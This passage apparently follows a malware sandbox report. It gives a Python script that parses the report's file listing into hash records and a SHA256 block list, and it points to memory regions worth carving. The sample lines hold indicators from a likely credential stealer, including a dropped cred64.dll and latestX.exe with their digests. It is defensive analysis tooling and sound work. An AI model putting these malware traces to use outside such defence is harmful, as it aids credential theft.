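The listing above is the raw material for a hash blocklist and for mapping which process image got written where, but it is not machine-friendly as printed. The parser below is an added example, not part of this report or of the sandbox's own tooling. It assumes only the layout visible on the page: a file path line followed by one or more `MD5`/`SHA1`/`SHA256`/`SHA512` lines, and memory dumps named `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp`. The embedded sample is a handful of lines copied from this section; digests of wrong length are reported rather than silently accepted, and the `matches_digests` helper lets you confirm a file you have in hand is the same object the sandbox hashed.

```python
"""Parse a sandbox 'Files' listing (path + hash lines, memory dump names) into IOC records.

Added example; the layout rules are assumptions taken from the listing as printed.
"""
import hashlib
import re
from dataclasses import dataclass, field

HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
MEMORY_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
# "<ALGO> <hexdigest>"
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")


@dataclass
class FileRecord:
    path: str
    hashes: dict = field(default_factory=dict)  # algo -> lowercase hex digest


@dataclass
class MemoryRegion:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_listing(text: str):
    """Return (file_records, memory_regions, errors) for a listing in the page's format."""
    files, regions, errors = [], [], []
    current = None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = MEMORY_RE.match(line)
        if m:
            current = None  # a dump line ends the previous file's hash block
            regions.append(MemoryRegion(int(m["pid"]), int(m["seq"]),
                                        int(m["start"], 16), int(m["end"], 16)))
            continue
        h = HASH_RE.match(line)
        if h:
            algo, digest = h.group(1), h.group(2).lower()
            if current is None:
                errors.append(f"line {lineno}: {algo} digest without a preceding path")
            elif len(digest) != HASH_LENGTHS[algo]:
                errors.append(f"line {lineno}: {algo} digest has {len(digest)} hex chars, "
                              f"expected {HASH_LENGTHS[algo]}")
            else:
                current.hashes[algo] = digest
            continue
        # Anything else is treated as a file path that opens a new record.
        current = FileRecord(path=line)
        files.append(current)
    return files, regions, errors


def sha256_blocklist(files) -> set:
    """SHA256 values suitable for a hash-based block or hunt list."""
    return {f.hashes["SHA256"] for f in files if "SHA256" in f.hashes}


def largest_region_per_pid(regions) -> dict:
    """For each PID, the biggest dumped region (typically the unpacked image)."""
    best = {}
    for r in regions:
        if r.pid not in best or r.size > best[r.pid].size:
            best[r.pid] = r
    return best


def matches_digests(data: bytes, record: FileRecord) -> bool:
    """True if every digest recorded for `record` matches `data`; False if none recorded."""
    if not record.hashes:
        return False
    return all(hashlib.new(algo.lower(), data).hexdigest() == digest
               for algo, digest in record.hashes.items())


# Constructed sample: a few lines copied verbatim from the report's file listing.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

memory/628-299-0x0000000000400000-0x000000000046F000-memory.dmp

memory/3544-341-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
"""

if __name__ == "__main__":
    files, regions, errors = parse_listing(SAMPLE)
    for f in files:
        print(f.path, f.hashes.get("SHA256"))
    for pid, r in largest_region_per_pid(regions).items():
        print(f"pid {pid}: 0x{r.start:X}-0x{r.end:X} ({r.size} bytes)")
    print("errors:", errors)
```

Regions that start at `0x400000` are the usual default image base of a 32-bit PE, so the largest such region per PID (for PID 3544 above, roughly 36 MB) is the first candidate to carve and re-hash; feed the `sha256_blocklist` output to your EDR rather than the MD5s, which the page also lists but which are not collision-resistant.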